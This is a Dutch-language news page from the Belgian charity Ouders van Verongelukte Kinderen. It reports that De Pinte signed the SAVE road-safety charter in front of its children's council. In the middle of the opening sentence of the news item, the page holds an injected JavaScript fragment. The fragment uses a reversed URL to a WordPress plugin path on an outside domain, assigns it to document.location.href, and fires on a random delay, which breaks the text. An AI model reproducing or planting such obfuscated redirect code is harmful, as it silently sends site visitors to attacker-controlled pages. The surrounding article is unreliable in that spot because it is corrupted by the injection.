Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

De Pinte ondertekent SAVE-charter

Onder het toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeziend oog van de kindergemeenteraad ondertekende De Pinte op 25 april het SAVE-charter Steden & Gemeenten. De Pinte is daarmee de 44e Vlaamse gemeente die ondertekend en de 11e in Oost-Vlaanderen. De Pinte wil hiermee een duidelijk signaal geven dat ze zich actief wil inzetten voor meer verkeersveiligheid. De Pinte wil een gezinsvriendelijke gemeente zijn met een aangename en verkeersveilige omgeving voor haar inwoners.

Een eerste actiepunt voor hun SAVE-actieplan is alvast de actualisatie van de schoolbereikbaarheidskaart na de opmaak van het nieuwe mobiliteitsplan. Bijkomend  formuleerde de kindergemeenteraad tijdens het ondertekeningsmoment 9 voorstellen die mee de basis zullen vormen voor het SAVE-actieplan.

AVS bracht deze ondertekening in beeld. Het beeldfragment is hier te vinden: ondertekening SAVE-charter De Pinte


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be